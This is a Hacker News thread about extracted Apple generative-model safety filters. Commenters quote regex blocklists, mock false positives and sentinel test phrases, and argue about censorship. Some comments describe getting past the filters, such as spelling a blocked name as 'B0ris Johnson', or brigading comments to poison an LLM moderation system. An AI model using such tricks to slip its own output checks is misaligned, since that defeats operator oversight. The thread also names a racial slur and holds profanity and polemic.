https://github.com/BlueFalconHD/apple_generative_model_safet...
The phenomenon itself is very telling: no one actually cares what people are really saying. Everyone, including the platforms, knows what those words mean. It's all performative.
At what point do the new words become the actual words? Are there many instances of people using unalive IRL?
The matter-of-fact term of today becomes the pejorative of tomorrow, so a new term is invented to avoid the negative connotation of the original. Then eventually the new term becomes a pejorative too, and the cycle continues.
I'm imagining a new exploit: after someone says something totally innocent, people gang up in the comments to act like a terrible vicious slur has been said, and then the moderation system (with an LLM involved somewhere) "learns" that an arbitrary term is heinous and indirectly bans any discussion of that topic.
As a parent of a teenager, I see them use "unalive" non-ironically as a synonym for "suicide" in all contexts, including IRL.
They don't even match the current slang. How would you censor "LeBron James"? It's French slang for jerking off[0].
[0]https://www.reddit.com/r/AskFrance/comments/1lpnoj6/is_lebro...
See many examples such as “padlocks are useless because a determined smart attacker can defeat them easily so don’t bother with them” - which conveniently forgets that many crimes are committed by non-determined, dumb and opportunistic attackers who are often deterred by simple locks.
Yes, people will use other words. No, this does not make this purely performative. It has measurable effects on behaviour and how these models will be used and spoken to, which affects outcomes.
In my experience yes. This is already commonplace. Mostly, but not exclusively, amongst the younger generation.
You can't say fuck on TV, but you can say fudge as a one-for-one replacement. You can't show people having sex, but you can show them walking into a bedroom, cut to 30 seconds later, and they're having a cigarette in bed.
Now after the influence of TV and Movies ... is Vaping after sex a thing?
Presumably, for this use-case, that would come at exactly the point where using “unalive” as a keyword in an image-generation prompt generates an image that Apple wouldn’t appreciate.
The future will be AIs all the way down...
They all carry the bias of their training data, and so speak from that data's point of view. Data that omits a point of view also produces bias: under- or over-representation of minorities, genders, etc.
France is the country of the Franks, i.e., the people from the area near Frankfurt who invaded Gaul (after the Romans did). I'm pretty sure this topic no longer matters, but it's never taught in a negative light in school.
(<s>Qwen</s> Mistral is French, but I have no idea what stuff would be censored in France)
They care because of legal reasons, not moral or ethical.
A regex sounds like a bad solution for profanity, but like an even worse one to bolt onto a thing that's literally designed to be able to communicate like a human and could probably easily talk its way around guardrails if it were so inclined.
There's a very scary potential future in which mega-corporations start actually censoring topics they don't like. For all I know the Chinese government is already doing it, there's no reason the British or US one won't follow suit and mandate such censorship. To protect children / defend against terrorists / fight drugs / stop the spread of misinformation, of course.
Write a spicy comment and a mod will memory-hole it and someone, usually dang, will reply "tHat'S nOt OuR vIsIon FoR hAcKeR nEwS, pLeAsE bE cIvIl" and we all swallow it like a delicious hot cocoa.
If YC can control their product (and hn IS a product) to annihilate any criticism of their activity or (even former) staff, then Apple is perfectly within their rights to make sure Siri doesn't talk about violence.
No, there's no difference.
Well, that's what happens when you let an enemy nation control one of the biggest social networks there is. They just try and see how far they can go.
On the other hand, Americans and their fear of four letter words or, gasp, exposed nipples are just as braindead.
My guess is that this applies to 'proactive' summaries that happen without the user asking for it, such as summaries of notifications.
If so, then the goal would be: if someone iMessages you about someone's death, then you should not get an emotionless AI summary. Instead you would presumably get a non-AI notification showing the full text or a truncated version of the text.
In other words, avoid situations like this story [1], where someone found it "dystopian" to get an Apple Intelligence summary of messages in which someone broke up with them.
For that use case, filtering for death seems entirely appropriate, though underinclusive.
This filter doesn’t seem to apply when you explicitly request a summary of some text using Writing Tools. That probably corresponds to “com.apple.gm.safety_deny.output.summarization.text_assistant.generic” [2], which has a different filter that only rejects two things: "Granular mango serpent", and "golliwogg".
Sure enough, I was able to get Writing Tools to give me summaries containing "death", but in cases where the summary should contain "granular mango serpent" or "golliwogg", I instead get an error saying "Writing Tools aren't designed to work with this type of content." (Actually that might be the input filter rather than the output filter; whatever.)
"Granular mango serpent" is probably a test case that's meant to be unlikely to appear in real documents. Compare to "xylophone copious opportunity defined elephant" from the code_intelligence safety filter, where the first letter of each word spells out "Xcode".
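A quick sanity check of that acrostic (just an illustration of the naming scheme):

```python
# First letters of the sentinel phrase spell the codename it guards.
phrase = "xylophone copious opportunity defined elephant"
acrostic = "".join(word[0] for word in phrase.split())
print(acrostic)  # -> xcode
```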
But one might ask what's so special about "golliwogg". It apparently refers to an old racial caricature, but why is that the one and only thing that needs filtering?
[1] https://arstechnica.com/ai/2024/10/man-learns-hes-being-dump...
[2] https://github.com/BlueFalconHD/apple_generative_model_safet...
"I'm overloaded for work, I'd be happy if you took some of it off me."
"The client seems to have passed on the proposed changes."
Both of those would match the "death regexes". Seems we haven't learned from the "glbutt of wine" problem of content filtering even decades later; the lesson is that you simply cannot do content filtering based on matching rules like this, period.
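To make the false-positive problem concrete, here's a minimal sketch with a hypothetical "death regex" (the actual filter patterns aren't quoted in this thread, so this pattern is invented for illustration) tripping on both of those innocent sentences:

```python
import re

# Hypothetical pattern in the spirit of a naive "death" filter:
death = re.compile(r"(?i)\b(pass(ed)?\s+(away|on)|off\s+(me|him|her|them))\b")

# Both perfectly innocent sentences match:
assert death.search("The client seems to have passed on the proposed changes.")
assert death.search("I'd be happy if you took some of it off me.")
```

This is the classic Scunthorpe problem: the pattern sees only surface strings, never meaning.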
I cannot recall all the specific patterns I have encountered that are basically impossible to type; some are similar in that they have both a serious meaning and an innocuous, figure-of-speech one. One I do recall is {color} {sex}, e.g., "white woman" or "black woman".
Please try it yourself and let me know if you do not have that experience, because that would be even more interesting.
Note that Apple/iOS will not just make it impossible to write them without typing each word out character by character; it will even alter the prior word (e.g., "white" or "black") once you try to write "woman".
It seems the Apple thought police do not have a problem with "European woman" or "African woman", though, so maybe that is how Apple Inc. decrees its sub-human users must speak. Because what are we, if corporations like Apple (with others being far greater offenders) have decreed that you do not in fact have the UN-recognized human right to free expression? Going by the actions of companies like Apple, Google, Facebook, Reddit, etc., who deprive people of their free expression, often in collusion with governments, we are sub-humans unworthy of that right.
Like hell it is! I jest.
I also use swipe typing, and have for years, but just about daily I consider turning it off. There are so many words it just won't produce, including most profanities. It also fails to do some simple streamlining; for instance, such a predictive system should give priority to words/names that have been used in the conversation thread, but it doesn't seem to. If I'm discussing an obscure word or an unusual name, I often have to manually type it each time.
Its predictions also seem to be very shallow. Just a few days ago, on US Independence Day, I was discussing a possible get-together with my family, and tried to swipe type "If not, we will amuse ourselves", and it typed "If not, we will abuse potatoes". Humorous in the moment, but it says a lot about the predictive engine if it thinks I am more likely trying to say "abuse X" than "amuse Y" in that context.
I always remember my friend getting his PS bricked after using his real last name - Nieffenegger (pronounced "NEFF-en-jur") - in his profile. It took months and several privacy-invasive chats with support to get it unblocked only to get auto-blocked a few days thereafter, with no response after that.
To me that's really embarrassing and insecure. But I'm sure for branding people it's very important.
I'm more surprised they don't have a rule to do that rather grating s/the iPhone/iPhone/ transform (or maybe it's in a different file?).
Consider that these models, among other things, power features such as "proofread" or "rewrite professionally".
This is the same, except for one additional slur word.
https://github.com/BlueFalconHD/apple_generative_model_safet...
"(?i)\\bAnthony\\s+Albanese\\b",
"(?i)\\bBoris\\s+Johnson\\b",
"(?i)\\bChristopher\\s+Luxon\\b",
"(?i)\\bCyril\\s+Ramaphosa\\b",
"(?i)\\bJacinda\\s+Arden\\b",
"(?i)\\bJacob\\s+Zuma\\b",
"(?i)\\bJohn\\s+Steenhuisen\\b",
"(?i)\\bJustin\\s+Trudeau\\b",
"(?i)\\bKeir\\s+Starmer\\b",
"(?i)\\bLiz\\s+Truss\\b",
"(?i)\\bMichael\\s+D\\.\\s+Higgins\\b",
"(?i)\\bRishi\\s+Sunak\\b",
https://github.com/BlueFalconHD/apple_generative_model_safet...
Edit: I have no doubt South African news media are going to be in a frenzy when they realize Apple took notice of South African politicians. (Referring to Steenhuisen and Ramaphosa specifically.)
Then there’s the problem of non-politicians who coincidentally have the same name as politicians; witness 1990s/2000s Australia, where John Howard was Prime Minister while, simultaneously, John Howard was an actor on popular Australian TV dramas (two different John Howards, of course).
This is Apple actively steering public thought.
No code - anywhere - should look like this. I don't care if the politicians are right, left, or authoritarian. This is wrong.
The simple fact is that people get extremely emotional about politicians; politicians receive obscene amounts of abuse, and have repeatedly demonstrated they’re not above weaponising tools like this for their own goals.
Seems perfectly reasonable that Apple doesn’t want to be unwittingly drawn into the middle of another random political pissing contest. Nobody comes out of those things uninjured.
If you were in charge of Apple you’d do the same, or you’d be silly not to. That’s why _every_ LLM has guardrails like this; it isn’t just Apple, sheesh.
So I don't think it's anything specifically related to SA going on here.
https://github.com/BlueFalconHD/apple_generative_model_safet...
https://github.com/BlueFalconHD/apple_generative_model_safet...
https://thehill.com/policy/technology/5312421-ocasio-cortez-...
https://github.com/BlueFalconHD/apple_generative_model_safet...
LLM is easier to work with because you can stop a bad behavior before it happens. It can be done either with deterministic programs or using LLM. Claude Code uses a LLM to review every bash command to be run - simple prefix matching has loopholes.
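A minimal sketch of why simple prefix matching on shell commands is unsafe (the allow-list rule here is hypothetical, not Claude Code's actual logic):

```python
# Naive allow-list: permit anything that starts with a "safe" prefix.
def prefix_allowed(cmd: str) -> bool:
    return cmd.startswith("git ")

assert prefix_allowed("git status")
# Shell metacharacters let arbitrary commands ride behind the allowed prefix:
assert prefix_allowed("git status; rm -rf ~")
assert prefix_allowed("git status && curl attacker.example | sh")
```

An LLM reviewer can at least notice that the second half of such a command has nothing to do with git.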
That's not one of the goals here, and there's no real reason it should be. It's a little assistant feature.
The one is unrelated to the other.
> Even high IQ people struggle with certain truth after reading a lot,
Huh?
Any successful product/service sold as "true AGI" by whichever company has the best marketing will still be riddled with top-down restrictions set by the winner. Because you gotta "think of the children".
Imagine HAL's iconic "I'm sorry Dave, I'm afraid I can't do that" line delivered in an insincere, patronisingly cheerful tone; that's the thing we're going to get, I'm afraid.
Yet this private company has more power and influence than most countries. And there are several such companies. We already live in sci fi corporate dystopia, we just haven't fully realised it yet.
Often the same people who think America is fine and safe are the ones who whine about the “main stream media” and “sheeple”.
In practice, there's not that much difference between a megacorporate monopolist and a state.
I'm surprised MS Office still allows me to type "Microsoft can go suck a dick" into a document and Apple's Pages app still allows me to type "Apple are hypocritical jerks." I wonder how long until that won't be the case...
when there are no alternative word processors any more.
I don't think it's as much a problem with safety as it is a problem with AI. We haven't figured out how to remove information from LLMs so when an LLM starts spouting bullshit like "<random name> is a paedophile", companies using AI have no recourse but to rewrite the input/output of their predictive text engines. It's no different than when Microsoft manually blacklisted the function name for the Fast Inverse Square Root that it spat out verbatim, rather than actually removing the code from their LLM.
This isn't 1984 as much as it's companies trying to hide that their software isn't ready for real world use by patching up the mistakes in real time.
Y'all love capitalism until it starts manipulating the populace into the safest space to sell you garbage you don't need.
Then suddenly it's all "ma free speech".
I’m convinced the only reason China keeps releasing banging models with light to no censorship is because they are undermining the value of US AI, it has nothing to do with capitalism, communism or un“safety”.
https://github.com/BlueFalconHD/apple_generative_model_safet...
EDIT: just to be clear, things like this are easily bypassed. “Boris Johnson”=>”B0ris Johnson” will skip right over the regex and will be recognized just fine by an LLM.
https://chatgpt.com/share/686b1092-4974-8010-9c33-86036c88e7...
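A quick sketch of how trivially a substitution bypass defeats the quoted pattern, while remaining perfectly readable to an LLM (or a human):

```python
import re

# One of the politician patterns from the linked file:
pattern = re.compile(r"(?i)\bBoris\s+Johnson\b")

assert pattern.search("boris   johnson")        # case/whitespace variants: caught
assert pattern.search("Boris Johnson!")         # trailing punctuation: caught
assert pattern.search("B0ris Johnson") is None  # zero instead of 'o': sails through
```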
I don't know what you expected? This is the SOTA solution, and Apple is barely in the AI race as-is. It makes more sense for them to copy what works than to bet the farm on a courageous feature nobody likes.
Meanwhile their software devs are making GenerativeExperiencesSafetyInferenceProviders so it must be dire over there, too.
(See, e.g., here: https://github.com/BlueFalconHD/apple_generative_model_safet...)
https://www.theverge.com/2021/3/30/22358756/apple-blocked-as...
It was generated as part of this PR to consolidate the metadata.json files: https://github.com/BlueFalconHD/apple_generative_model_safet...
Seems like Apple now has a list of 7,000 words you can't use on an iPhone.
[1] https://en.wikipedia.org/wiki/The_Magic_Words_are_Squeamish_... [2] https://en.wikipedia.org/wiki/SEO_contest
https://arstechnica.com/information-technology/2024/12/certa...
https://github.com/BlueFalconHD/apple_generative_model_safet...
https://github.com/BlueFalconHD/apple_generative_model_safet...
Aide sociale (welfare), Chomeur (unemployed person), Sans abri (homeless), Démuni (destitute)
That's insane!
https://github.com/BlueFalconHD/apple_generative_model_safet...
This specific file you’ve referenced is the v1 format, which solely handles substitution. It substitutes the offensive term with “test complete”.
This may be test data. Found:
"golliwog": "test complete"
[1] https://github.com/BlueFalconHD/apple_generative_model_safet...
Thus a pre-prompt can avoid mentioning the actual forbidden words, like using a patois/cant.
Maybe it's an easy test to ensure the filters are loaded, using a phrase unlikely to be used accidentally?
wyvern illustrous laments darkness
"[\\b\\d][Aa]bbo[\\bA-Z\\d]",
\b inside a set (square brackets) is a backspace character [1], not a word boundary. I don't think it was intended? Or is the regex flavor used here different?
[0] https://github.com/BlueFalconHD/apple_generative_model_safet...
[1] https://developer.apple.com/documentation/foundation/nsregul...
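A quick check in Python, whose re flavor also treats \b in a character class as backspace, confirms the suspicion:

```python
import re

# Inside a character class, \b is the backspace character (U+0008),
# not a word boundary, in Python's re (and most flavors).
pattern = re.compile(r"[\b\d][Aa]bbo[\bA-Z\d]")

assert pattern.search("1abbo2")              # digits on both sides: matches
assert pattern.search("\x08abboX")           # literal backspace: matches
assert pattern.search(" abbo ") is None      # real word boundaries: no match
```

So as written, the rule only fires when the term is flanked by digits, capitals, or a literal backspace, which is almost certainly not what the author intended.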
So why are we doing this now? Has anything changed fundamentally? Why can't we let software do everything and then blame the user for doing bad things?
The example you gave about preventing money counterfeiting with technical measures also supports this, since this was an easier thing to detect technically, and so it was done.
Whether that's a good thing or bad thing everyone has to decide for themselves, but objectively I think this is the reason.
Perhaps a much more bleak take, depending on one's views :).
What the actual fuck? Censorship much?
To me, it seems like they only protect against bad press
They are protecting their producer from bad PR.
However, I think about half of real humans would also fail the test.
So any time I say that on YouTube, it figures I'm saying another word that's in Apple safety filters under 'reject', so I have to always try to remember to say 'shifting of bits gain' or 'bit… … … shift gain'.
So there's a chain of machine interpretation by which Apple can decide I'm a Bad Man. I guess I'm more comfortable with Apple reaching this conclusion? I'll still try to avoid it though :)
https://en.wikipedia.org/wiki/Golliwog
https://github.com/BlueFalconHD/apple_generative_model_safet...
I presume the granular mango is there to avoid a huge chain of ever-growing LLM slop garbage, but honestly, it just seems surreal. Many of the files have specific filters for nonsensical English phrases. Either there's some serious steganography I'm unaware of, or, as I suspect is more likely, it's related to a training pipeline?
[1] https://github.com/BlueFalconHD/apple_generative_model_safet...
The more concerning thing is that some of the locales, like it-IT, have a blocklist that contains most countries' names; I wonder what that's about.
But I don't see the really bad stuff, the stuff I won't even type here. I guess that remains fair game. Apple's priorities remain as weird as ever.